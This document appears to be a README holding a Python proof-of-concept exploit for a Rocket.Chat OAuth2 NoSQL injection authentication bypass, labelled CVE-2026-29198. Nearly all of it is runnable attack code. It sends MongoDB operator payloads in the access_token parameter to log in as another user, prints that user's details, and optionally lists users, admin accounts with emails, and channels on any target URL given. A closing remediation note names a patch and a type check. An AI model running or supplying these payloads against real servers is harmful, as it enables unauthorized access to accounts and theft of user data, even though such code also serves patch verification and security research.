README.md
Rendering markdown...
#!/usr/bin/env python3
"""
** PoC By HMs **
CVE-2026-29198 - Rocket.Chat OAuth2 NoSQL Injection -> Auth Bypass
Usage:
python3 poc_cve_2026_29198.py --url http://localhost:3000
python3 poc_cve_2026_29198.py --url http://target --escalate -v
python3 poc_cve_2026_29198.py --url http://target --proxy http://127.0.0.1:8080
"""
import requests
import argparse
import json
import sys
import time
from urllib.parse import urlencode
try:
requests.packages.urllib3.disable_warnings()
except ImportError:
print("[!] requests not installed: pip install requests")
sys.exit(1)
# ── ANSI colours ──────────────────────────────────────────────────────────────
R = "\033[91m"; G = "\033[92m"; Y = "\033[93m"; B = "\033[94m"; W = "\033[0m"
def ok(msg): print(f"{G}[+]{W} {msg}")
def err(msg): print(f"{R}[-]{W} {msg}")
def inf(msg): print(f"{B}[*]{W} {msg}")
def wrn(msg): print(f"{Y}[!]{W} {msg}")
# ── NoSQL injection payloads ──────────────────────────────────────────────────
PAYLOADS = [
("$ne null", {"access_token[$ne]": "null"}),
("$ne empty", {"access_token[$ne]": ""}),
("$exists true", {"access_token[$exists]": "true"}),
("$gt empty", {"access_token[$gt]": ""}),
("$regex any", {"access_token[$regex]": "."}),
("$regex hex40", {"access_token[$regex]": "^[0-9a-f]{40}$"}),
]
# ── HTTP helper ───────────────────────────────────────────────────────────────
def get(session, url, params=None, verbose=False):
try:
r = session.get(url, params=params, timeout=10, verify=False)
if verbose:
inf(f"GET {r.url} -> HTTP {r.status_code}")
return r
except requests.exceptions.ConnectionError:
err(f"Connection refused: {url}")
return None
except requests.exceptions.Timeout:
err(f"Timeout: {url}")
return None
# ── Step 1: probe for vulnerability ──────────────────────────────────────────
def probe(session, base, verbose):
inf("Step 1 — probing for NoSQL injection vulnerability")
endpoint = f"{base}/api/v1/me"
# Baseline: unauthenticated request should return 401
r = get(session, endpoint, verbose=verbose)
if r is None:
return None, None
if r.status_code not in (401, 403, 200):
wrn(f"Unexpected baseline status {r.status_code} — continuing anyway")
for label, params in PAYLOADS:
r = get(session, endpoint, params=params, verbose=verbose)
if r is None:
continue
if r.status_code == 200:
try:
data = r.json()
except ValueError:
continue
if data.get("success") and data.get("_id"):
ok(f"Payload '{label}' succeeded!")
return params, data
if verbose:
inf(f" Payload '{label}' -> {r.status_code}")
return None, None
# ── Step 2: dump victim user info ─────────────────────────────────────────────
def dump_user(data):
inf("Step 2 — leaked user info")
fields = ["_id", "username", "name", "emails", "roles", "status", "active"]
for f in fields:
val = data.get(f)
if val is not None:
ok(f" {f}: {val}")
# ── Step 3: escalate — list users, find admins ────────────────────────────────
def escalate(session, base, winning_params, verbose):
inf("Step 3 — escalating: listing users via /api/v1/users.list")
r = get(session, f"{base}/api/v1/users.list",
params={**winning_params, "count": "50"}, verbose=verbose)
if r is None or r.status_code != 200:
err(f"users.list failed (HTTP {r.status_code if r else 'N/A'})")
err(" Likely requires admin role — victim token may not be admin")
return
try:
data = r.json()
except ValueError:
err("Non-JSON response from users.list")
return
users = data.get("users", [])
ok(f"users.list returned {len(users)} users")
admins = [u for u in users if "admin" in u.get("roles", [])]
if admins:
ok(f"Found {len(admins)} admin account(s):")
for a in admins:
ok(f" _id={a.get('_id')} username={a.get('username')} email={a.get('emails', [{}])[0].get('address', 'N/A')}")
else:
wrn("No admin accounts in first 50 users (may need pagination)")
inf("Step 3b — trying /api/v1/channels.list (admin-only)")
r2 = get(session, f"{base}/api/v1/channels.list",
params={**winning_params, "count": "10"}, verbose=verbose)
if r2 and r2.status_code == 200:
try:
ch = r2.json().get("channels", [])
ok(f"channels.list returned {len(ch)} channels")
for c in ch[:5]:
ok(f" #{c.get('name')} (msgs: {c.get('msgs')})")
except ValueError:
pass
else:
wrn(f"channels.list -> {r2.status_code if r2 else 'N/A'}")
# ── Step 4: check if patched ──────────────────────────────────────────────────
def check_patched(session, base, verbose):
inf("Patch check — sending string token to confirm baseline rejection")
r = get(session, f"{base}/api/v1/me",
params={"access_token": "INVALID_TOKEN_STRING"}, verbose=verbose)
if r and r.status_code == 401:
ok("String token correctly rejected (expected behaviour)")
elif r and r.status_code == 200:
wrn("String token accepted?! Check if this is a valid token collision")
# ── Main ──────────────────────────────────────────────────────────────────────
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-29198 PoC — Rocket.Chat OAuth2 NoSQL Injection")
parser.add_argument("--url", required=True, help="Base URL, e.g. http://localhost:3000")
parser.add_argument("--escalate", action="store_true", help="Attempt privilege escalation after bypass")
parser.add_argument("--proxy", help="HTTP proxy, e.g. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
args = parser.parse_args()
base = args.url.rstrip("/")
print(f"""
{R}╔══════════════════════════════════════════════════════════╗
║ CVE-2026-29198 Rocket.Chat OAuth2 NoSQL Injection PoC ║
║ **PoC by HMs** ║
╚══════════════════════════════════════════════════════════╝{W}
Target : {base}
""")
session = requests.Session()
session.headers.update({"User-Agent": "Mozilla/5.0 (PoC CVE-2026-29198)"})
if args.proxy:
session.proxies = {"http": args.proxy, "https": args.proxy}
inf(f"Proxy: {args.proxy}")
# Connectivity check — /api/v1/info may return 403 on older versions, try fallback
reachable = False
for probe_url in [f"{base}/api/v1/info", f"{base}/api/v1/me", f"{base}/"]:
r = get(session, probe_url, verbose=args.verbose)
if r is not None:
reachable = True
if probe_url.endswith("/info") and r.status_code == 200:
try:
ver = r.json().get("info", {}).get("version", "unknown")
ok(f"Server reachable — Rocket.Chat version: {ver}")
except ValueError:
ok("Server reachable")
else:
ok(f"Server reachable (HTTP {r.status_code} on {probe_url})")
break
if not reachable:
err("Cannot reach target. Exiting.")
sys.exit(1)
check_patched(session, base, args.verbose)
print()
winning_params, user_data = probe(session, base, args.verbose)
if winning_params is None:
err("All payloads failed — two possible reasons:")
err(" 1. Target is PATCHED (PR #39492 applied)")
err(" 2. No active OAuth tokens in DB (no user has done OAuth2 flow yet)")
sys.exit(1)
print()
dump_user(user_data)
if args.escalate:
print()
escalate(session, base, winning_params, args.verbose)
print(f"""
{G}[SUMMARY]{W}
Status : VULNERABLE
Payload : {winning_params}
Victim : {user_data.get('username')} (id={user_data.get('_id')})
Roles : {user_data.get('roles')}
Impact : Unauthenticated access as any user with an active OAuth token
{Y}[REMEDIATION]{W}
Apply patch from PR #39492 or upgrade to a fixed version.
Ensure typeof check on access_token query param before use.
""")
if __name__ == "__main__":
main()